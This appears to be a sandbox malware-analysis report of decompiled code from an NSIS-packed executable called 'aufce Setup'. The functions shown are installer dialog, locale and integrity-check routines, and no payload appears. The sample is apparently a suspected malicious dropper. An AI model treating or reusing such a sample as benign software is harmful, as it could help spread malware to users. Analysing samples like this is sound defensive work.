						 *0x41f4f8 = _t91;
						E00403E54(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423728); // executed
						 *0x42370c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42051c = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423f60;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403EA0(0x40b);
						while(1) {
							_t37 =  *0x42051c;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x423f64; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42370c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x423f64; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BBA(_t116, _t125, _t130, 0x42c800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E54(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E54(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423fcc - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E76(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f4f8, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423fcc - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x420530);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f4f8);
							}
							E00403E89();
							E00405B98(0x420538, "aufce Setup");
							E00405BBA(0x420538, _t125, _t130,  &(0x420538[lstrlenA(0x420538)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420538);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423718);
									 *0x41fd08 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423f40,  *_t130 +  *0x423720 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423718 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E54(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423718, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42370c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423718, 8);
									E00403EA0(0x405);
									goto L58;
								}
								__eflags =  *0x423fcc - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x423fc0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423718);
						 *0x423f48 = _t133;
						EndDialog(_t125,  *0x41f900);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423718, 0x40f, 0, 1);
						__eflags =  *0x42370c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420510, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420510,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403EBB(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423718, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fcc - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f900 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E2D();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f900 = _t127;
										goto L21;
									}
									__eflags =  *0x4091ac - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423718);
						 *0x423718 = _a12;
						L58:
						if( *0x421538 == _t133) {
							_t142 =  *0x423718 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421538 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                0x0040398a
                0x00403993
                0x00403ad4
                0x00403ad8
                0x00403adc
                0x00403ade
                0x00403ae3
                0x00403aee
                0x00403af9
                0x00403afe
                0x00403b00
                0x00403b02
                0x00403b05
                0x00403b0a
                0x00403b18
                0x00403b25
                0x00403b2c
                0x00403b2c
                0x00403b2d
                0x00403b2d
                0x00403b32
                0x00403b38
                0x00403b3f
                0x00403b45
                0x00403b47
                0x00403b87
                0x00403b8c
                0x00403b91
                0x00403b91
                0x00403b96
                0x00403b9f
                0x00403ba1
                0x00403ba6
                0x00403bac
                0x00403bb0
                0x00403bb0
                0x00403bb5
                0x00403bbb
                0x00000000
                0x00000000
                0x00403bc1
                0x00403bc6
                0x00403bcc
                0x00000000
                0x00000000
                0x00403bd5
                0x00403bdd
                0x00403be2
                0x00403be5
                0x00403beb
                0x00403bf0
                0x00403bf3
                0x00403bf9
                0x00403bfe
                0x00403c01
                0x00403c07
                0x00403c0f
                0x00403c15
                0x00403c1b
                0x00403c1f
                0x00403c26
                0x00403c26
                0x00403c26
                0x00403c30
                0x00403c42
                0x00403c4e
                0x00403c53
                0x00403c5d
                0x00403c63
                0x00403c65
                0x00403c6a
                0x00403c67
                0x00403c67
                0x00403c67
                0x00403c7a
                0x00403c92
                0x00403c94
                0x00403c9a
                0x00403caf
                0x00403c9c
                0x00403ca5
                0x00403ca7
                0x00403ca7
                0x00403cb5
                0x00403cc5
                0x00403cd6
                0x00403cdd
                0x00403ce3
                0x00403ce7
                0x00403cec
                0x00403cee
                0x00000000
                0x00403cf4
                0x00403cf4
                0x00403cf6
                0x00000000
                0x00000000
                0x00403cfc
                0x00403d00
                0x00403d25
                0x00403d2b
                0x00403d31
                0x00403d33
                0x00000000
                0x00000000
                0x00403d59
                0x00403d5f
                0x00403d61
                0x00403d66
                0x00000000
                0x00000000
                0x00403d6c
                0x00403d6f
                0x00403d72
                0x00403d89
                0x00403d95
                0x00403dae
                0x00403db4
                0x00403db8
                0x00403dbd
                0x00403dc3
                0x00000000
                0x00000000
                0x00403dcd
                0x00403dd8
                0x00000000
                0x00403dd8
                0x00403d02
                0x00403d08
                0x00000000
                0x00000000
                0x00403d0e
                0x00403d14
                0x00000000
                0x00000000
                0x00000000
                0x00403d1a
                0x00403cee
                0x00403de5
                0x00403df1
                0x00403df8
                0x00000000
                0x00403b49
                0x00403b49
                0x00403b4c
                0x00403b7f
                0x00403b7f
                0x00403b81
                0x00000000
                0x00000000
                0x00000000
                0x00403b81
                0x00403b4e
                0x00403b52
                0x00403b57
                0x00403b59
                0x00000000
                0x00000000
                0x00403b69
                0x00403b71
                0x00000000
                0x00403b77
                0x004039a5
                0x004039a5
                0x004039a9
                0x004039ae
                0x004039bd
                0x004039bd
                0x004039c6
                0x004039cf
                0x004039da
                0x004039da
                0x004039e6
                0x00403a02
                0x00403a05
                0x00403a18
                0x00403a1e
                0x00403ac1
                0x00000000
                0x00403aca
                0x00403a24
                0x00403a31
                0x00403a33
                0x00403a35
                0x00403a54
                0x00403a54
                0x00403a57
                0x00403a5c
                0x00403a5f
                0x00403a6f
                0x00403a70
                0x00403a72
                0x00403aa8
                0x00403abb
                0x00000000
                0x00403abb
                0x00403a74
                0x00403a7a
                0x00403a93
                0x00403a98
                0x00403a9a
                0x00000000
                0x00000000
                0x00403a9c
                0x00403a88
                0x00403a88
                0x00403a8a
                0x00403a8a
                0x00000000
                0x00403a8a
                0x00403a7d
                0x00403a82
                0x00000000
                0x00403a82
                0x00403a61
                0x00403a67
                0x00000000
                0x00000000
                0x00403a69
                0x00000000
                0x00403a69
                0x00403a59
                0x00000000
                0x00403a59
                0x00403a3f
                0x00403a46
                0x00403a4c
                0x00403a4e
                0x00000000
                0x00000000
                0x00000000
                0x00403a4e
                0x00403a0a
                0x00000000
                0x004039e8
                0x004039ee
                0x004039f8
                0x00403dfe
                0x00403e04
                0x00403e06
                0x00403e0c
                0x00403e11
                0x00403e17
                0x00403e17
                0x00403e0c
                0x00403e21
                0x00000000
                0x00403e21
                0x004039e6

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                • ShowWindow.USER32(?), ref: 004039DA
                • DestroyWindow.USER32 ref: 004039EE
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                • GetDlgItem.USER32 ref: 00403A2B
                • SendMessageA.USER32 ref: 00403A3F
                • IsWindowEnabled.USER32(00000000), ref: 00403A46
                • GetDlgItem.USER32 ref: 00403AF4
                • GetDlgItem.USER32 ref: 00403AFE
                • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403B18
                • SendMessageA.USER32 ref: 00403B69
                • GetDlgItem.USER32 ref: 00403C0F
                • ShowWindow.USER32(00000000,?), ref: 00403C30
                • EnableWindow.USER32(?,?), ref: 00403C42
                • EnableWindow.USER32(?,?), ref: 00403C5D
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                • EnableMenuItem.USER32 ref: 00403C7A
                • SendMessageA.USER32 ref: 00403C92
                • SendMessageA.USER32 ref: 00403CA5
                • lstrlenA.KERNEL32(00420538,?,00420538,aufce Setup), ref: 00403CCE
                • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                • ShowWindow.USER32(?,0000000A), ref: 00403E11
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                • String ID: aufce Setup
                • API String ID: 4050669955-1736180195
                • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                Download Yara Rule
                C-Code - Quality: 96%
                			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x4e0f60
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x4e6194
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x79
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                0x004035f1
                0x004035fa
                0x00403601
                0x00403603
                0x00403617
                0x00403629
                0x00403633
                0x00403638
                0x0040363e
                0x00403651
                0x00403651
                0x0040365c
                0x00403605
                0x00403610
                0x00403610
                0x00403661
                0x00403666
                0x0040366b
                0x00403674
                0x00403679
                0x0040368a
                0x00403711
                0x00403719
                0x00403722
                0x00403722
                0x00403738
                0x0040373e
                0x0040374c
                0x004037db
                0x004037e3
                0x004037ed
                0x004037f2
                0x004037f8
                0x00403882
                0x00403887
                0x00403889
                0x004038a5
                0x00000000
                0x004038a5
                0x0040388b
                0x00403891
                0x00403899
                0x00403899
                0x00000000
                0x00403891
                0x00403806
                0x00403811
                0x00403816
                0x00403818
                0x0040381f
                0x0040381f
                0x0040382a
                0x00403832
                0x00403834
                0x00403836
                0x0040383f
                0x00403842
                0x00403848
                0x00403848
                0x0040384e
                0x00403867
                0x00403878
                0x00000000
                0x0040387d
                0x004037e5
                0x004037e7
                0x00000000
                0x00403752
                0x00403752
                0x00403758
                0x00403762
                0x0040376a
                0x00403774
                0x0040377a
                0x00403788
                0x004038aa
                0x004038aa
                0x00000000
                0x004038aa
                0x0040378e
                0x00403797
                0x004037d6
                0x00000000
                0x004037d6
                0x00403690
                0x00403690
                0x00403695
                0x00000000
                0x00000000
                0x0040369a
                0x0040369f
                0x004036af
                0x004036b4
                0x004036bb
                0x00000000
                0x00000000
                0x004036bf
                0x004036c1
                0x004036ce
                0x004036ce
                0x004036d6
                0x004036dc
                0x00403704
                0x0040370c
                0x00000000
                0x004036ee
                0x004036ef
                0x004036f8
                0x004036fe
                0x004036ff
                0x00000000
                0x004036ff
                0x004036fa
                0x004036fc
                0x00000000
                0x00000000
                0x00000000
                0x004036fc
                0x004036dc

                APIs
                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\,?,"C:\Users\user\Desktop\RHK098760045678009000.exe" ,00000000), ref: 0040365C
                • lstrlenA.KERNEL32(ymvwfuvwx,?,?,?,ymvwfuvwx,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user~1\AppData\Local\Temp\), ref: 004036D1
                • lstrcmpiA.KERNEL32(?,.exe,ymvwfuvwx,?,?,?,ymvwfuvwx,00000000,C:\Users\user~1\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                • GetFileAttributesA.KERNEL32(ymvwfuvwx), ref: 004036EF
                • LoadImageA.USER32 ref: 00403738
                  • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                • RegisterClassA.USER32 ref: 0040377F
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                • CreateWindowExA.USER32 ref: 004037D0
                • ShowWindow.USER32(00000005,00000000), ref: 00403806
                • GetClassInfoA.USER32 ref: 00403832
                • GetClassInfoA.USER32 ref: 0040383F
                • RegisterClassA.USER32 ref: 00403848
                • DialogBoxParamA.USER32 ref: 00403867
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.263609418.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.263603207.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263627006.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263631692.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263647032.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263653995.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263661513.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.263668333.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.263691098.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\RHK098760045678009000.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ymvwfuvwx$6B
                • API String ID: 1975747703-1229964062
                • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\frontdesk\\Desktop\\RHK098760045678009000.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\frontdesk\\Desktop";
				E00405B98("C:\\Users\\frontdesk\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x2b400
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x2b400
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x2b400
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x2b400
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                0x00402c5d
                0x00402c60
                0x00402c63
                0x00402c66
                0x00402c6c
                0x00402c7d
                0x00402c82
                0x00402c95
                0x00402c9a
                0x00402c9d
                0x00402ca3
                0x00000000
                0x00402ca5
                0x00402cb0
                0x00402cb6
                0x00402cc7
                0x00402cce
                0x00402cd4
                0x00402cd6
                0x00402cdb
                0x00402cdd
                0x00402dca
                0x00402dcc
                0x00402dd1
                0x00402dd8
                0x00000000
                0x00000000
                0x00402dda
                0x00402ddd
                0x00402e01
                0x00402e06
                0x00402e0c
                0x00402e0e
                0x00402e17
                0x00402e1c
                0x00402e1f
                0x00402e20
                0x00402e21
                0x00402e23
                0x00402e28
                0x00402e2b
                0x00402e3e
                0x00402e42
                0x00402e4a
                0x00402e4f
                0x00402e51
                0x00402e51
                0x00402e51
                0x00402e59
                0x00402e59
                0x00402e5c
                0x00402e5d
                0x00402e5d
                0x00402e60
                0x00402e62
                0x00402e62
                0x00402e62
                0x00402e6c
                0x00402e72
                0x00402e80
                0x00402e85
                0x00000000
                0x00402e85
                0x00000000
                0x00402e2b
                0x00402de5
                0x00402df0
                0x00402df5
